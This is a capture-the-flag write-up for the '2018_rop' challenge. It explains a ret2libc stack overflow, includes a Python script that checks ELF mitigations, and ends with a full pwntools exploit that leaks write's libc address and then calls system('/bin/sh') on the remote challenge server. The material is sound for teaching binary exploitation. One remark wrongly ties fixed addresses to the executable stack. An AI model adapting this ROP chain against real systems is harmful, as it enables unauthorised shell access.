铁人三项(第五赛区)_2018_rop
checksec shows every protection turned off. Loading the binary in IDA, the logic is a short, simple chain of calls; in the second function there is an obvious stack overflow. The challenge does not hand you anything shell-related directly, so this is a ret2libc problem. The binary does import write, so the plan is to use write to leak a libc address.
On write's fd parameter
I found the following explanation:
write() writes up to count bytes from the buffer starting at buf to the file referred to by the file descriptor fd.
In short, 0 stands for stdin and 1 stands for stdout. This is not necessarily accurate, but it helps as a memory aid.
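Since the whole approach hinges on "checksec shows every protection off", a practitioner will want to verify that claim independently of the checksec script. The following is an added example, not code from the original write-up: it reads the ELF header and program headers with the standard library only and reports PIE (e_type == ET_DYN), NX (the PT_GNU_STACK segment lacks PF_X; a missing segment is reported as NX off, matching checksec) and RELRO (a PT_GNU_RELRO segment exists). It does not detect stack canaries, which would need the symbol table. The sample binaries are constructed in the build_elf32 helper (an assumption for testing, not a real file) so the script runs offline; pass the bytes of a real 32- or 64-bit ELF to elf_mitigations to check it.

```python
import struct

# ELF constants (from the ELF specification)
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_GNU_STACK, PT_GNU_RELRO = 1, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4


def elf_mitigations(data: bytes) -> dict:
    """Report PIE / NX / RELRO for a 32- or 64-bit ELF image given as bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2              # EI_CLASS: 1 = ELFCLASS32, 2 = ELFCLASS64
    endian = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little, 2 = big
    if is64:
        hdr_fmt, phdr_fmt = "HHIQQQIHHH", "IIQQQQQQ"
    else:
        hdr_fmt, phdr_fmt = "HHIIIIIHHH", "IIIIIIII"
    (e_type, _machine, _version, _entry, e_phoff, _shoff,
     _flags, _ehsize, e_phentsize, e_phnum) = struct.unpack_from(endian + hdr_fmt, data, 16)

    nx = False      # no PT_GNU_STACK at all -> executable stack (checksec reports NX off)
    relro = False
    for i in range(e_phnum):
        fields = struct.unpack_from(endian + phdr_fmt, data, e_phoff + i * e_phentsize)
        # p_flags sits at index 1 in Elf64_Phdr but index 6 in Elf32_Phdr
        p_type, p_flags = fields[0], (fields[1] if is64 else fields[6])
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    return {"pie": e_type == ET_DYN, "nx": nx, "relro": relro}


def build_elf32(e_type: int, stack_flags: int) -> bytes:
    """Constructed minimal ELF32 image for testing: one PT_LOAD plus one PT_GNU_STACK."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # 32-bit, little-endian, v1
    ehdr = struct.pack("<HHIIIIIHHHHHH",
                       e_type, 3, 1,      # e_type, EM_386, EV_CURRENT
                       0x8048000, 52, 0,  # e_entry, e_phoff (right after header), e_shoff
                       0, 52, 32, 2,      # e_flags, e_ehsize, e_phentsize, e_phnum
                       0, 0, 0)           # no section headers
    load = struct.pack("<IIIIIIII", PT_LOAD, 0, 0x8048000, 0x8048000,
                       0x1000, 0x1000, PF_R | PF_X, 0x1000)
    stack = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return e_ident + ehdr + load + stack


if __name__ == "__main__":
    # A binary like the one in the write-up: non-PIE, RWX stack, no RELRO.
    print(elf_mitigations(build_elf32(ET_EXEC, PF_R | PF_W | PF_X)))
    # A hardened layout for comparison: PIE with a non-executable stack.
    print(elf_mitigations(build_elf32(ET_DYN, PF_R | PF_W)))
```

The NX verdict is the one that matters most for this write-up: with an executable stack and no PIE, every address in the exploit is fixed at link time, which is exactly why the plt/got values can be read straight out of the file.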
from pwn import *
from LibcSearcher import *
#context.log_level="debug"
context(os='linux',arch='i386', log_level = 'debug')
#p=process('./2018_rop')
elf=ELF('./2018_rop')
p=remote('node4.buuoj.cn', 26830)
main_addr = 0x080484C6
write_plt = elf.plt['write']
write_got = elf.got['write']
# Stage 1: overflow the 0x88-byte buffer plus saved ebp, then call write(1, write_got, 4)
# with main as the return address so the program loops back for a second input.
payload = b'a'*(0x88 + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)
# The 4 bytes written to stdout (fd 1) are the resolved address of write in libc.
write_addr = u32(p.recv(4))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
# Stage 2: same overflow, now returning into system("/bin/sh"); the second
# system_addr only fills the return-address slot that system expects above its argument.
payload=b'a'*(0x88+0x4) + p32(system_addr) + p32(system_addr) + p32(binsh_addr)
p.sendline(payload)
p.interactive()